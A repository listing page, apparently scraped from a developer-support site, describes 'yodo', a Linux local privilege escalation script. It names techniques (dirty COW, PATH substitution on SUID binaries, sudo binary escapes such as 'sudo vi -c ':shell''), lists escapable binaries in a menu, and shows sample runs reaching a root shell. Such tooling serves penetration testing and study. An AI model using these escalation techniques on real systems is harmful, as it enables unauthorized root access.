Need help with yodo?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

b3rito
202 Stars 33 Forks GNU General Public License v3.0 31 Commits 0 Opened issues

Description

Local Privilege Escalation

Services available

!
?

Need anything else?

Contributors list

yodo

This tool proves how easy it is to become root via limited sudo permissions, via dirty COW or using Pa(th)zuzu.

dirty COW : exploits a race condition in the implementation of the copy-on-write mechanism Link : https://dirtycow.ninja

Pa(th)zuzu : Checks for PATH substitution vulnerabilities, logs the commands executed by the vulnerable executables and injects commands with the permissions of the owner of the process (SUID) Link : https://github.com/ShotokanZH/Pa-th-zuzu

Extra features

- VSP : checks if the user is able to overwrite a sudo-enabled command with his own

History : checks for * history (like bash_history) files. You could be lucky!

b3 : tries to substitute commands that has root privileges [sudo -l >>> User may run the following commands ... (root) NOPASSWD: /path/to/script]

Example: If a user has sudo privileges only on vi, he could become root by runnuing this command: sudo vi -c ':shell'

[email protected] ~/Desktop $ sudo vi -c ':shell'
[sudo] password for b3rito:
victim Desktop # whoami
root

Author

Written by b3rito at mes3hacklab

Installation

chmod +x yodo.sh

Usage

./yodo.sh

[email protected] ~/Desktop $ ./yodo.sh
=======================================================================                                                       
                                ....                         
                            ..  .77.                        
                            Z.  ,77?                        
                           .Z$.....,?+?.       
                   ....     $?Z.77+??I..            
                   .7I.  .....~.77:=I..Z.....      
                   .77?  ..7?.?.=7....ZO..~..            
               ..  ..7$7.=7I$.??+.$$~.==.??..    .~..  
              .$Z$..Z...77.$7..+=?,.I?=.++.+~....?7... ..  
               ..?.I7:..77....$$IO++??=...7$.Z$..7$?..7$  
               .77.+:$?7..Z$.?,.~M,?,..77. .ZZ...,,.$77.. 
          ..$=. +7$7...77+$I? ???M.$.I:~I?..,$..7$.Z7=.   
          ..Z7Z.=..~,.....,=O...~MI=~=...O$.~...?7..:$7I. 
          ...Z.Z.?I?.=:.??...??..M.ZZ.. ,.~Z$I,.,7...I.,....   
          ..,......:.~~.?.?+..?~7M..,?...==.~7..:.Z$+.. ....
            .?7..??,...Z.=?:.I7..M. D$Z?$+=.:... +Z+,....77.....
      .$~...:+O7$.+I+$=~:.=...7,:M.M~7 ..Z$..+~:?...7?$.?$~.OZZ$Z...
      ..$I7=?I?,..7?$$M..=:..?...MM.7$,.7...:??....,7I...?..Z$Z$$$.
      ...,=~.?.+.7.....8.$...?,+~MD+I...$7.I.O$Z$.. D8..I=$:$,....
        .$~+$....7Z.$$$7M.?+=$..,M8 .Z.I., M,ZZZ.MM..7+?+77..7..
          .. ...$.MM.....MZ$~Z:Z,MM.O$,$7,MZ .NMM.~77.+?+.7...
             I7~Z....MM .M7Z....?MMO,Z..$.M 8MM ..=77I=~?..I~.
        .$7I7?.+...$...:MMM. .$=OMM?Z,,..MMMMMMMMMMMMMI..=Z$+...
        ..?7I$$I.+.O:Z,=.8MN.$??MMM..$7.MMM...Z.$.+,?.Z.Z=..$77$..
               ...?OMMMMMMDMM7$IMMM ..MMM..,$7.Z$Z..??I$,Z.?I...
               7?:++.??=...~8D..MMM MMMM.???.$...~$.....$Z..7$.. 
               .....??,::Z$::MM.MMMMMM,,=II?II,.....   ...... ..
                    ,...?:...IOOO8OO8 ?I,:        ,.     
                        .     88OOOO. :.                 
                       .:,,,:,.8OOOO :.                  
                       .,....,. OO8M:.. :.               
                        ..... . 8OMN.:.                  
                               .ONM8::.                  
                :8MDO  8MDO   :8MDO,    DMO8M       :8MDO, 
                  DMO  DMO  .+8D   MO,  DMO  8M   .+8D   MO,
                    O  O    $O     OMM  DMO   8M  $O     OMM 
                  :8MDO    .OO     O8   DMO  8M  .OO     O8M,
                  DMO         .8°O88    DMO8M       .8°O88
                              .8OOOO. .           :.       
                   ...         OOOOO,.                       
    ..  . ......    .........,.MMMMMMI.,........... .       
      .     .. ,INMMMMMMMMMMMMMMMMMMIZMMMMMMMN7=..... . . .  ..
             .  =. ......~?ZMMMIM.MM NMMN...   .......=+ . .  
             .  .. .  .$...MM,.MM ..MD....MMMMO... .. ..,..~ 
             ,     .   . :MM.  MM  .ZMM?.. .$M...7MD77ZD+.,. 
          .    .  :=D7Z8MM.   .M:   .. .MD.. .7D~. ..,.O. .. 
          .. $..=.    ?M?. .. .M.  ..M...IMM  .,..M ..   ..:.. 
          . ..... . .MM.Z   D ,M+. . :+..M. N+ . . ..? . .... 
                   .M7=.+.=.~.:MM.    .  , . .M..   .  ,.  
                  .N?.8. ~  ..,M 8. ... . M. . M.      . . .  
              . ..NM .$..    .MM...  .    ,+.:: 8 .         
             . =M.M ..?..    ..M  M .   . .M .I,.M.       
        ,~~  .   .I...8..    M M  .8,.     Z.... b3    
           .     +.   +. .. : .M....O.    ...  . D.=.   
                 O.  .~,    $. 8     .    .~.  ..+ .   
                 8.   ...   M. ,..   , +   .I.. .,..7  
                 O.    .    I   I     ..  .   .  .... 
                 +.      .  :  .M.                   
                  .         .   M                  
                 ..         .   ..                
                 .          .                    
                  ~.             N.                                         
=======================================================================
Possible options (‡ excluded):
 [·] find
 [·] vi
 [·] b3

Select From the menu:

  1. Find 8) Man * 17) Pathzuzu °‡

  2. AWK 10) Dirty COW °‡ 18) History °‡

  3. Nmap 11) Gdb 19) Vim

  4. Vi 12) Ruby 20) Lua

  5. Python 13) b3 21) Ftp *

  6. Irb 14) Perl 22) Credits

  7. Less * 15) Tee 23) Update

  8. More * 16) VSP °‡ 99) Exit

    VSP = Vulnerable Script Permissions Pathzuzu = SUID exploitation through Path vulnerability b3 = editable root privileged commands listed in 'sudo -l'

    • user interatcion ° sudo not required Enter Number: 1 [sudo] password for b3rito: victim Desktop # whoami root victim Desktop #

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.